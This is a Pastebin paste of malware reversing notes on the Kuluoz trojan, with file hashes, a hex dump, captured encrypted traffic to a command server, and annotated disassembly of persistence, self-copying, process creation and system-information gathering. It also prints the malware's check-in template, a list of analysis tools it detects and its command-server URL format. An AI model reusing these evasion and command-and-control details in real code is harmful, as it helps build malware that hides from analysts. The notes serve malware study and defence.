Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # MalwareMustDie! Kuluoz Reversing Notes | @unixfreaxjp
- ================================================================================
- Size: 134656
- MD5: 22f7171ebb630b38cbfc288ccfea9b91
- SHA1: fae4a4bb291577379e15ea244d004667b902ab80
- SHA256: 360e964ae4aaf043ea27780f20ab266bf55470e3d58fa20550c9f2c520823fbe
- VT: https://www.virustotal.com/en/file/360e964ae4aaf043ea27780f20ab266bf55470e3d58fa20550c9f2c520823fbe/analysis/
- Malvert: https://lh4.googleusercontent.com/-jia-_8n-2Og/Uv6fkrqjH6I/AAAAAAAAOnQ/4NTsHPMkUTw/s600/KU110100101.png
- 検知率は駄目…関係ないマルウェア名だらけで検知された(FAIL!): https://lh6.googleusercontent.com/-H9scD705q9M/Uv6gpsW1d8I/AAAAAAAAOnY/HeALnilCrEk/s1212/KU000001.png
- Traffic: https://lh6.googleusercontent.com/-Nv-h8wIhJCE/Uv6fkugVA1I/AAAAAAAAOnM/yX5m0hRjCQY/s600/KU1111111.png
- ================================================================================
- PE Information
- Sections:
- .text 0x1000 0x11cce 73216
- .code 0x13000 0x1a5 512
- .rdata 0x14000 0x300e 12800
- .data 0x18000 0xe1dc 45056
- .rsrc 0x27000 0x720 2048
- [0x00000000:0x00400000]> x
- 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
- 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
- 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- 0030 00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00 ................
- 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
- 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
- 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
- 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
- 0080 2F 32 53 74 6B 53 3D 27 6B 53 3D 27 6B 53 3D 27 /2StkS=`kS=`kS=`
- 0090 4C 95 40 27 7B 53 3D 27 4C 95 53 27 73 53 3D 27 L.@`{S=`L.S`sS=`
- [...]
- [0x00000000:0x00400000]> !date
- Sat Feb 15 07:14:24 JST 2014
- // ===========
- // SUMMARY
- // ===========
- // Compiler..
- Microsoft Visual C++ Runtime Library
- // Same templates:
- {
- <knock><id>%s</id><group>%s</group><src>%d</src><transport>%d</transport><time>%d</time>
- <version>%d</version><status>%d</status><debug>%s</debug></knock> }
- // autostart..as usual too..
- { Software\Microsoft\Windows\CurrentVersion\Run }
- // Attached is typical first Kuluoz latest ver callback
- (pic)
- // Detected software:
- {wireshark.exe
- vmusrvc.exe
- VBoxService.exe
- SharedIntApp.exe
- prl_tools.exe
- prl_cc.exe
- vmsrvc.exe
- vmtoolsd.exe
- iptools.exe
- VBoxTray.exe }
- // Public key for decrypt:
- -----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUAUdLJ1rmxx
- +bAndp+Cz6+5I Kmgap2hn2df/UiVglAvvg2US9qbk65ixqw3dGN/9O9B30q5RD+xtZ6gl4ChBquqwj
- wxzGTVqJeexn5RHjtFR9lmJMYIwzoc/kMG8e6C/GaS2FCgY8oBpcESVyT2woV7U 00SNFZ88nyVv33z
- 9+wIDAQAB -----END PUBLIC KEY-----
- // gates path:
- /index.php?r=gate
- // if you know C maybe you can guess this :-))
- %1024[^=]=%1024[^;]
- // template URL
- http://%[^:]:%d/%s
- // CNC Reply decoded:
- STATUS_NO_CALLBACK_ACTIVE
- //=========================
- // TRAFFIC OF TWO TEST PC
- //=========================
- // Take one...
- 00000000 50 4f 53 54 20 2f 34 37 39 42 36 39 39 37 33 36 POST /47 9B699736
- 00000010 38 33 31 39 39 30 42 46 35 35 46 46 44 32 32 37 831990BF 55FFD227
- 00000020 37 43 44 42 33 38 45 32 46 31 39 45 35 32 45 32 7CDB38E2 F19E52E2
- 00000030 20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 HTTP/1. 1..Accep
- 00000040 74 3a 20 2a 2f 2a 0d 0a 43 6f 6e 74 65 6e 74 2d t: */*.. Content-
- 00000050 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f Type: ap plicatio
- 00000060 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c n/x-www- form-url
- 00000070 65 6e 63 6f 64 65 64 0d 0a 55 73 65 72 2d 41 67 encoded. .User-Ag
- 00000080 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 ent: Moz illa/5.0
- 00000090 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 31 (Window s NT 6.1
- 000000A0 3b 20 57 4f 57 36 34 3b 20 72 76 3a 32 35 2e 30 ; WOW64; rv:25.0
- 000000B0 29 20 47 65 63 6b 6f 2f 32 30 31 30 30 31 30 31 ) Gecko/ 20100101
- 000000C0 20 46 69 72 65 66 6f 78 2f 32 35 2e 30 0d 0a 48 Firefox /25.0..H
- 000000D0 6f 73 74 3a 20 38 35 2e 32 35 2e 31 30 38 2e 31 ost: 85. 25.108.1
- 000000E0 36 34 3a 34 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 64:443.. Content-
- 000000F0 4c 65 6e 67 74 68 3a 20 33 30 38 0d 0a 43 61 63 Length: 308..Cac
- 00000100 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 he-Contr ol: no-c
- 00000110 61 63 68 65 0d 0a 0d 0a 80 00 00 00 46 41 e6 45 ache.... ....FA.E
- 00000120 81 6f e6 0a 84 d5 a1 63 99 a0 65 bb 57 e5 e4 cc .o.....c ..e.W...
- 00000130 c1 a6 c6 33 be ca 73 d1 cc 02 30 87 c9 00 75 3f ...3..s. ..0...u?
- 00000140 42 f2 80 79 b8 c7 79 f7 8c f9 9c 7b f2 16 6d 37 B..y..y. ...{..m7
- 00000150 08 59 92 5e 4f 1b 97 47 08 4f 5b 9f e0 3a 29 aa .Y.^O..G .O[..:).
- 00000160 12 b4 db 6a be 20 10 97 a9 5c 3c 65 d4 98 d9 f8 ...j. .. .\<e....
- 00000170 40 fc ea d3 47 4d 8f ff a0 0a 77 43 03 24 f1 6c @...GM.. ..wC.$.l
- 00000180 91 4e 95 15 1f 6e d1 3c 88 6d 41 8a 35 23 fa cb .N...n.< .mA.5#..
- 00000190 32 0f 55 0d e5 3a 2a 61 c2 8d 83 37 ac 00 00 00 2.U..:*a ...7....
- 000001A0 14 a9 f9 fe 25 f2 dc 9d 6d da 75 3e c6 9a 4d 4f ....%... m.u>..MO
- 000001B0 e9 72 20 6e a4 ec ac 4b 0f 53 e7 74 8d 5f 09 da .r n...K .S.t._..
- 000001C0 f0 86 d4 6f c7 9c d3 e0 dc 3e 22 33 c0 64 6a f9 ...o.... .>"3.dj.
- 000001D0 3e ad 22 c7 52 2d 59 46 75 ce 47 7e 68 77 b2 6b >.".R-YF u.G~hw.k
- 000001E0 66 1c ce a4 38 df bd d0 b3 65 9e c4 0a 20 d9 5b f...8... .e... .[
- 000001F0 d5 29 ed e2 b0 78 e6 22 ac 08 b3 c2 66 59 88 38 .)...x." ....fY.8
- 00000200 e6 40 fc 12 b7 71 4a 6c f5 6a bd 5d 9b 2a 82 26 .@...qJl .j.].*.&
- 00000210 44 9b b3 2a f3 12 be d0 83 8d ec 12 a2 a2 b9 58 D..*.... .......X
- 00000220 e8 e3 5d 74 53 0b c6 be 09 b6 e8 bc 69 b0 86 fa ..]tS... ....i...
- 00000230 77 7d 60 99 50 bd 2e 54 e4 bb 2c 54 07 67 1a 23 w}`.P..T ..,T.g.#
- 00000240 d8 00 86 23 00 66 f3 a3 2a 81 e9 47 ...#.f.. *..G
- 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
- 00000010 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 .Server: nginx/1
- 00000020 2e 32 2e 36 0d 0a 44 61 74 65 3a 20 46 72 69 2c .2.6..Da te: Fri,
- 00000030 20 31 34 20 46 65 62 20 32 30 31 34 20 31 35 3a 14 Feb 2014 15:
- 00000040 30 38 3a 35 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 08:52 GM T..Conte
- 00000050 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 nt-Type: text/ht
- 00000060 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d ml; char set=utf-
- 00000070 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 8..Trans fer-Enco
- 00000080 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 ding: ch unked..C
- 00000090 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 onnectio n: close
- 000000A0 0d 0a 0d 0a 65 66 0d 0a 80 00 00 00 07 6a 06 61 ....ef.. .....j.a
- 000000B0 12 2c 66 a2 d3 00 14 36 9d 35 60 ac ec d6 14 7b .,f....6 .5`....{
- 000000C0 7e f3 70 59 96 41 09 9d 7c 82 c7 58 d9 82 d9 e9 ~.pY.A.. |..X....
- 000000D0 44 eb 6d 98 50 41 3f 38 34 04 39 c5 da 51 72 c7 D.m.PA?8 4.9..Qr.
- 000000E0 12 af 62 16 14 b4 59 66 4e b2 2f 54 8e 23 86 dd ..b...Yf N./T.#..
- 000000F0 b4 e4 b0 01 d5 6d 0b 60 77 4c 02 7b 60 8a 7b 74 .....m.` wL.{`.{t
- 00000100 27 ae 68 18 53 96 9b 02 d1 72 bc 8b 03 36 e0 0b `.h.S... .r...6..
- 00000110 bf e2 8c 4c 14 d9 7d f0 53 12 e0 2b a2 26 12 c7 ...L..}. S..+.&..
- 00000120 94 8f 60 04 40 9b 46 a1 a4 51 af c1 67 00 00 00 ..`.@.F. .Q..g...
- 00000130 14 a9 f9 fe 25 f2 dc 9d 6d da 4c 3a 1d b5 4d 4f ....%... m.L:..MO
- 00000140 db b2 20 3e b4 33 09 ae ea 67 ca 86 06 a0 09 ae .. >.3.. .g......
- 00000150 b4 25 6f c2 5b 53 5a 22 78 87 ec 95 0d 63 5f 49 .%o.[SZ" x....c_I
- 00000160 09 54 54 be 5d 20 3b a7 5f 8d d3 09 8c be 8e 8d .TT.] ;. _.......
- 00000170 b8 cc a9 8b ea 47 fc 30 1e 7e 1e fc d1 68 ec ef .....G.0 .~...h..
- 00000180 84 25 50 90 f3 a9 4f 6c b3 fa d4 36 08 5b 59 92 .%P...Ol ...6.[Y.
- 00000190 f9 fc 9c 87 f5 1a df 0d 0a 30 0d 0a 0d 0a ........ .0....
- // Take two...
- 00000000 50 4f 53 54 20 2f 44 43 43 35 32 33 44 43 38 34 POST /DC C523DC84
- 00000010 42 41 41 35 46 44 46 37 38 35 36 46 39 38 46 37 BAA5FDF7 856F98F7
- 00000020 39 30 35 46 38 38 38 33 42 32 43 38 36 33 43 30 905F8883 B2C863C0
- 00000030 20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 HTTP/1. 1..Accep
- 00000040 74 3a 20 2a 2f 2a 0d 0a 43 6f 6e 74 65 6e 74 2d t: */*.. Content-
- 00000050 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f Type: ap plicatio
- 00000060 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c n/x-www- form-url
- 00000070 65 6e 63 6f 64 65 64 0d 0a 55 73 65 72 2d 41 67 encoded. .User-Ag
- 00000080 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 ent: Moz illa/5.0
- 00000090 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 31 (Window s NT 6.1
- 000000A0 3b 20 57 4f 57 36 34 3b 20 72 76 3a 32 35 2e 30 ; WOW64; rv:25.0
- 000000B0 29 20 47 65 63 6b 6f 2f 32 30 31 30 30 31 30 31 ) Gecko/ 20100101
- 000000C0 20 46 69 72 65 66 6f 78 2f 32 35 2e 30 0d 0a 48 Firefox /25.0..H
- 000000D0 6f 73 74 3a 20 38 35 2e 32 35 2e 31 30 38 2e 31 ost: 85. 25.108.1
- 000000E0 36 34 3a 34 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 64:443.. Content-
- 000000F0 4c 65 6e 67 74 68 3a 20 33 30 39 0d 0a 43 61 63 Length: 309..Cac
- 00000100 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 he-Contr ol: no-c
- 00000110 61 63 68 65 0d 0a 0d 0a 80 00 00 00 f1 47 79 19 ache.... .....Gy.
- 00000120 3f 84 3c f8 82 0f df f0 5c 88 a2 77 17 4c 24 0d ?.<..... \..w.L$.
- 00000130 58 20 03 b0 7c 0a f0 f7 f8 59 0a 91 28 9c fa 05 X ..|... .Y..(...
- 00000140 15 7e e6 2b 69 ab 0a 50 89 95 8e 19 12 57 3f 1b .~.+i..P .....W?.
- 00000150 11 7e 74 4e 11 c5 b1 a8 f5 48 61 2e f0 c2 89 97 .~tN.... .Ha.....
- 00000160 ab 6c 2a ec c6 bd bd a3 20 d6 b6 d0 d6 5e e7 5a .l*..... ....^.Z
- 00000170 b2 c6 74 d9 88 91 d6 7d 86 ac 60 a1 53 81 a1 6e ..t....} ..`.S..n
- 00000180 9f 2d ce b4 dc f5 d9 36 d1 ad 31 00 10 cb 11 07 .-.....6 ..1.....
- 00000190 7a a2 c0 89 8c 84 63 9b ed 8c 5e 52 ad 00 00 00 z.....c. ..^R....
- 000001A0 31 95 f9 a1 4d 42 70 93 dd 40 0b 1f c5 27 5e cd 1...MBp. .@...`^.
- 000001B0 83 30 91 c8 59 c4 bf 70 2f a0 04 31 c7 28 f9 6e .0..Y..p /..1.(.n
- 000001C0 bc b4 16 e7 42 11 16 b2 6e a6 1c 33 ca 60 1e 4d ....B... n..3.`.M
- 000001D0 3c 9e 8f 93 20 8c e0 3c c3 56 a5 3e 72 b9 97 2e <... ..< .V.>r...
- 000001E0 7f d3 68 e2 ea 78 b0 96 74 e3 06 4a 01 1f 92 f2 ..h..x.. t..J....
- 000001F0 27 60 e6 29 b8 92 1e 65 02 8e a4 58 4f e2 72 8b ``.)...e ...XO.r.
- 00000200 9d 23 09 d3 93 ff 09 aa a3 65 90 03 ae bb 52 c8 .#...... .e....R.
- 00000210 22 b8 70 10 b8 c9 04 3f 72 ea 38 d0 96 75 69 67 ".p....? r.8..uig
- 00000220 e3 25 f1 f0 d8 4c 7f df b0 79 96 0f f9 1e 0f 61 .%...L.. .y.....a
- 00000230 27 1c 3d 11 e4 78 f7 a4 84 dc 66 05 b4 c8 07 8a `.=..x.. ..f.....
- 00000240 f5 a6 95 a6 6b 5e 85 b1 6f cc 81 a9 72 ....k^.. o...r
- 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
- 00000010 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 .Server: nginx/1
- 00000020 2e 32 2e 36 0d 0a 44 61 74 65 3a 20 46 72 69 2c .2.6..Da te: Fri,
- 00000030 20 31 34 20 46 65 62 20 32 30 31 34 20 31 34 3a 14 Feb 2014 14:
- 00000040 33 36 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 36:26 GM T..Conte
- 00000050 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 nt-Type: text/ht
- 00000060 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d ml; char set=utf-
- 00000070 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 8..Trans fer-Enco
- 00000080 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 ding: ch unked..C
- 00000090 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 onnectio n: close
- 000000A0 0d 0a 0d 0a 66 35 0d 0a 80 00 00 00 5e be 4e a5 ....f5.. ....^.N.
- 000000B0 91 74 d2 a7 f1 61 c8 0a 57 46 12 0c 61 62 11 22 .t...a.. WF..ab."
- 000000C0 61 0f 87 6b ac 12 3e 87 9d 71 57 59 82 fd ce 87 a..k..>. .qWY....
- 000000D0 8e 2c 8a fa a6 b6 d8 f8 03 d8 38 f7 09 59 9d d5 .,...... ..8..Y..
- 000000E0 f6 6d b9 72 79 ea f9 be b9 9d 66 94 92 f8 59 c2 .m.ry... ..f...Y.
- 000000F0 7d 6a 4b bd 19 4b 77 8d 06 6e e3 93 d6 46 24 15 }jK..Kw. .n...F$.
- 00000100 f9 b2 35 d1 74 9d 2e 76 68 67 8a 0c d1 83 ef 0b ..5.t..v hg......
- 00000110 b0 0f e0 a6 80 98 b3 14 0e e1 e3 c0 2f 6e 0b 73 ........ ..../n.s
- 00000120 c6 fa 2a 74 1d 78 b0 7a 0e 0d a0 20 6d 00 00 00 ..*t.x.z ... m...
- 00000130 31 95 f9 a1 4d 42 70 93 dd 40 ec 83 d9 19 5e cd 1...MBp. .@....^.
- 00000140 93 f0 91 98 49 3b 18 b0 ca b1 29 c3 4c d7 f9 1a ....I;.. ..).L...
- 00000150 f8 16 95 58 ed a4 3d 35 c7 cf 0f 7e 63 d2 8e ce ...X..=5 ...~c...
- 00000160 4c 39 a4 c1 9b 58 e0 7c 3f 08 9e 36 7f 3c 1a 67 L9...X.| ?..6.<.g
- 00000170 43 22 58 b1 09 e4 8a ab b2 27 fa 6c 03 b7 c1 83 C"X..... .`.l....
- 00000180 bf bb 4a f9 b1 64 3c de 53 14 92 51 c6 67 bc e1 ..J..d<. S..Q.g..
- 00000190 18 f3 b1 58 88 1a a5 24 70 00 bb 6c 9a 0d 0a 30 ...X...$ p..l...0
- 000001A0 0d 0a 0d 0a ....
- "
- // ===========
- // REVERSING..
- // ===========
- // Anti Debug??
- 0x38000E pop ebx
- 0x38000F sub ebx, 13h
- 0x380012 call 0x380224h target: 0x380224
- 0x380017 or eax, eax
- 0x380019 je 0x380141h target: 0x380141
- 0x38001F call dword ptr [ebx+00000525h] GetProcessHeap@KERNEL32.DLL [0 Params]
- // The self copy..
- 0x8D3BE0 call dword ptr [0x8DE0A0h] CreateFileA@KERNEL32.DLL [7 Params]
- 0x8D3BE6 mov dword ptr [ebp-0Ch], eax
- 0x8D3BE9 cmp dword ptr [ebp-0Ch], 00000000h
- 0x8D3BED je 0x8D3C21h target: 0x8D3C21
- 0x8D3BEF push 00000000h
- 0x8D3BF1 lea ecx, dword ptr [ebp-04h]
- 0x8D3BF4 push ecx
- 0x8D3BF5 mov edx, dword ptr [ebp+0Ch]
- 0x8D3BF8 push edx
- 0x8D3BF9 mov eax, dword ptr [ebp+08h]
- 0x8D3BFC push eax
- 0x8D3BFD mov ecx, dword ptr [ebp-0Ch]
- 0x8D3C00 push ecx
- 0x8D3C01 call dword ptr [0x8DE0A4h] WriteFile@KERNEL32.DLL [5 Params]
- 0x8D3C07 test eax, eax
- 0x8D3C09 je 0x8D3C17h target: 0x8D3C17
- // Create process (svchost.exe)
- 0x4114F7 push 0x4010C8h ASCII "svchost.exe"
- 0x4114FC push 00000000h
- 0x4114FE call dword ptr [0x40100Ch] CreateProcessA@KERNEL32.DLL [10 Params]
- 00411504 mov eax, dword ptr [ebp-000000ECh]
- // Specifically check the timezone...
- 0x41002A push 0x425FC0h xref: 0x41001B
- 0x41002F call dword ptr [0x4140F0h] GetTimeZoneInformation@KERNEL32.DLL [1 Params]
- 0x410035 cmp eax, edi
- 0x410037 je 0x4100FFh target: 0x4100FF
- 0x41003D xor ecx, ecx
- 0x41003F inc ecx
- // sleep...so many. why??
- 0x8D581A call dword ptr [0x8DE088h] Sleep@KERNEL32.DLL [1 Params]
- 0x8D5820 jmp 0x8D5831h xref: 0x8D5813 target: 0x8D5831
- 0x8D5822 mov eax, dword ptr [ebp-00000248h] xref: 0x8D57F4
- [...]
- 0x8D583F call dword ptr [0x8DE088h] Sleep@KERNEL32.DLL [1 Params]
- 0x8D5845 mov dword ptr [ebp-00000248h], 00000000h
- // opening some services riding on svchost..[some, I pasted one of em]
- 0x1003229 call dword ptr [0x1001124h] RpcServerUnregisterIfEx@RPCRT4.DLL [3 Params]
- 0x100322F mov esi, 0x1004094h
- 0x1003234 push esi
- 0x1003235 mov edi, eax
- 0x1003237 call dword ptr [0x100x1068h] EnterCriticalSection@KERNEL32.DLL [Unknown Params]
- 0x100323D dec dword ptr [0x1004090h]
- 0x1003243 jne 0x1003253h target: 0x1003253
- 0x1003245 push 00000000h
- 0x1003247 call dword ptr [0x1001144h] RpcMgmtStopServerListening@RPCRT4.DLL [1 Params]
- 0x100324D call dword ptr [0x1001128h] RpcMgmtWaitServerListen@RPCRT4.DLL [Unknown Params]
- 0x1003253 push esi xref: 0x1003243
- 0x1003254 call dword ptr [0x100x1060h] LeaveCriticalSection@KERNEL32.DLL [Unknown Params]
- 0x100325A push edi
- 0x100325B call dword ptr [0x1001140h] I_RpcMapWin32Status@RPCRT4.DLL [1 Params]
- // Retrieving system`s user information:
- // User Name
- 0x8D2470 push ebp xref: 0x8D4F76
- 0x8D2471 mov ebp, esp
- 0x8D2473 sub esp, 0000009Ch
- 0x8D2479 mov dword ptr [ebp-1Ch], 00000000h
- 0x8D2480 mov dword ptr [ebp-08h], 00000000h
- 0x8D2487 mov dword ptr [ebp-18h], 00000000h
- 0x8D248E lea eax, dword ptr [ebp-18h]
- 0x8D2491 push eax
- 0x8D2492 push 00000000h
- 0x8D2494 call dword ptr [0x8DE02Ch] GetUserNameA@ADVAPI32.DLL [2 Params]
- 0x8D249A mov ecx, dword ptr [ebp-18h]
- 0x8D249D add ecx, 01h
- 0x8D24A0 push ecx
- 0x8D24A1 push 000000x8h
- 0x8D24A3 call dword ptr [0x8DE0ACh] GetProcessHeap@KERNEL32.DLL [0 Params]
- 0x8D24A9 push eax
- 0x8D24AA call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D24B0 mov dword ptr [ebp-24h], eax
- 0x8D24B3 lea edx, dword ptr [ebp-18h]
- 0x8D24B6 push edx
- 0x8D24B7 mov eax, dword ptr [ebp-24h]
- 0x8D24BA push eax
- 0x8D24BB call dword ptr [0x8DE02Ch] GetUserNameA@ADVAPI32.DLL [2 Params]
- 0x8D24C1 mov dword ptr [ebp-18h], 00000000h
- 0x8D24C8 mov dword ptr [ebp-00000094h], 00000000h
- 0x8D24D2 lea ecx, dword ptr [ebp-0Ch]
- 0x8D24D5 push ecx
- 0x8D24D6 lea edx, dword ptr [ebp-00000094h]
- 0x8D24DC push edx
- 0x8D24DD push 00000000h
- 0x8D24DF lea eax, dword ptr [ebp-18h]
- 0x8D24E2 push eax
- // Account Name...
- 0x8D24E3 push 00000000h
- 0x8D24E5 mov ecx, dword ptr [ebp-24h]
- 0x8D24E8 push ecx
- 0x8D24E9 push 00000000h
- 0x8D24EB call dword ptr [0x8DE030h] LookupAccountNameA@ADVAPI32.DLL [7 Params]
- 0x8D24F1 mov edx, dword ptr [ebp-18h]
- 0x8D24F4 push edx
- 0x8D24F5 push 000000x8h
- 0x8D24F7 call dword ptr [0x8DE0ACh] GetProcessHeap@KERNEL32.DLL [0 Params]
- 0x8D24FD push eax
- 0x8D24FE call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D2504 mov dword ptr [ebp-08h], eax
- 0x8D2507 mov eax, dword ptr [ebp-00000094h]
- 0x8D250D add eax, 01h
- 0x8D2510 push eax
- 0x8D2511 push 000000x8h
- 0x8D2513 call dword ptr [0x8DE0ACh] GetProcessHeap@KERNEL32.DLL [0 Params]
- 0x8D2519 push eax
- 0x8D251A call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D2520 mov dword ptr [ebp-1Ch], eax
- 0x8D2523 lea ecx, dword ptr [ebp-0Ch]
- 0x8D2526 push ecx
- 0x8D2527 lea edx, dword ptr [ebp-00000094h]
- 0x8D252D push edx
- 0x8D252E mov eax, dword ptr [ebp-1Ch]
- 0x8D2531 push eax
- 0x8D2532 lea ecx, dword ptr [ebp-18h]
- 0x8D2535 push ecx
- 0x8D2536 mov edx, dword ptr [ebp-08h]
- 0x8D2539 push edx
- 0x8D253A mov eax, dword ptr [ebp-24h]
- 0x8D253D push eax
- 0x8D253E push 00000000h
- 0x8D2540 call dword ptr [0x8DE030h] LookupAccountNameA@ADVAPI32.DLL [7 Params]
- 0x8D2546 mov dword ptr [ebp-10h], 00000000h
- 0x8D254D mov dword ptr [ebp-20h], 00000004h
- 0x8D2554 lea ecx, dword ptr [ebp-04h]
- // Query Registry version Name...
- 0x8D2557 push ecx
- 0x8D2558 push 00000001h
- 0x8D255A push 00000000h
- 0x8D255C push 0x8DE1FCh ASCII "Software\Microsoft\Windows NT\CurrentVersion"
- 0x8D2561 push 80000002h
- 0x8D2566 call dword ptr [0x8DE034h] RegOpenKeyExA@ADVAPI32.DLL [5 Params]
- 0x8D256C test eax, eax
- 0x8D256E jne 0x8D25A4h target: 0x8D25A4
- 0x8D2570 mov dword ptr [ebp-00000098h], 00000004h
- 0x8D257A lea edx, dword ptr [ebp-20h]
- 0x8D257D push edx
- 0x8D257E lea eax, dword ptr [ebp-10h]
- 0x8D2581 push eax
- 0x8D2582 lea ecx, dword ptr [ebp-00000098h]
- 0x8D2588 push ecx
- 0x8D2589 push 00000000h
- 0x8D258B push 0x8DE22Ch ASCII "InstallDate"
- 0x8D2590 mov edx, dword ptr [ebp-04h]
- 0x8D2593 push edx
- 0x8D2594 call dword ptr [0x8DE038h] RegQueryValueExA@ADVAPI32.DLL [6 Params]
- 0x8D259A mov eax, dword ptr [ebp-04h]
- 0x8D259D push eax
- 0x8D259E call dword ptr [0x8DE03Ch] RegCloseKey@ADVAPI32.DLL [1 Params]
- 0x8D25A4 push 00001000h xref: 0x8D256E
- 0x8D25A9 push 00000000h
- 0x8D25AB mov ecx, dword ptr [0x8E12D8h] 0x00AC0000
- 0x8D25B1 push ecx
- [...]
- // Query Registry InstallDate,,,
- 0x8D255C push 0x8DE1FCh ASCII "Software\Microsoft\Windows NT\CurrentVersion"
- 0x8D2561 push 80000002h
- 0x8D2566 call dword ptr [0x8DE034h] RegOpenKeyExA@ADVAPI32.DLL [5 Params]
- 0x8D256C test eax, eax
- 0x8D256E jne 0x8D25A4h target: 0x8D25A4
- 0x8D2570 mov dword ptr [ebp-00000098h], 00000004h
- 0x8D257A lea edx, dword ptr [ebp-20h]
- 0x8D257D push edx
- 0x8D257E lea eax, dword ptr [ebp-10h]
- 0x8D2581 push eax
- 0x8D2582 lea ecx, dword ptr [ebp-00000098h]
- 0x8D2588 push ecx
- 0x8D2589 push 00000000h
- 0x8D258B push 0x8DE22Ch ASCII "InstallDate"
- 0x8D2590 mov edx, dword ptr [ebp-04h]
- 0x8D2593 push edx
- 0x8D2594 call dword ptr [0x8DE038h] RegQueryValueExA@ADVAPI32.DLL [6 Params]
- 0x8D259A mov eax, dword ptr [ebp-04h]
- 0x8D259D push eax
- 0x8D259E call dword ptr [0x8DE03Ch] RegCloseKey@ADVAPI32.DLL [1 Params]
- // Internet connection to send POST...
- 0x8D2C00 push ebp xref: 0x8D2FDB
- 0x8D2C01 mov ebp, esp
- 0x8D2C03 sub esp, 34h
- 0x8D2C06 mov dword ptr [ebp-08h], 00000000h
- 0x8D2C0D push 00001000h
- 0x8D2C12 push 00000000h
- 0x8D2C14 mov eax, dword ptr [008E12D8h] 0x00AC0000
- 0x8D2C19 push eax
- 0x8D2C1A call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D2C20 mov dword ptr [ebp-14h], eax
- 0x8D2C23 push 00001000h
- 0x8D2C28 push 00000000h
- 0x8D2C2A mov ecx, dword ptr [008E12D8h] 0x00AC0000
- 0x8D2C30 push ecx
- 0x8D2C31 call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D2C37 mov dword ptr [ebp-0Ch], eax
- 0x8D2C3A mov edx, dword ptr [ebp-0Ch]
- 0x8D2C3D push edx
- 0x8D2C3E lea eax, dword ptr [ebp-1Ch]
- 0x8D2C41 push eax
- 0x8D2C42 mov ecx, dword ptr [ebp-14h]
- 0x8D2C45 push ecx
- 0x8D2C46 push 0x8DE2D0h ASCII "http://%[^:]:%d/%s"
- 0x8D2C4B mov edx, dword ptr [ebp+08h]
- 0x8D2C4E push edx
- 0x8D2C4F call dword ptr [008E12B4h] sscanf@NTDLL.DLL [0 Params]
- 0x8D2C55 add esp, 14h
- 0x8D2C58 push 00001000h
- 0x8D2C5D push 00000000h
- 0x8D2C5F mov eax, dword ptr [008E12D8h] 0x00AC0000
- 0x8D2C64 push eax
- 0x8D2C65 call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D2C6B mov dword ptr [ebp-18h], eax
- 0x8D2C6E mov ecx, dword ptr [ebp+10h]
- 0x8D2C71 mov edx, dword ptr [ebp+18h]
- 0x8D2C74 lea eax, dword ptr [edx+ecx+00001000h]
- 0x8D2C7B push eax
- 0x8D2C7C push 00000000h
- 0x8D2C7E mov ecx, dword ptr [008E12D8h] 0x00AC0000
- 0x8D2C84 push ecx
- 0x8D2C85 call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D2C8B mov dword ptr [ebp-04h], eax
- 0x8D2C8E push 00000000h
- 0x8D2C90 push 00000000h
- 0x8D2C92 push 00000000h
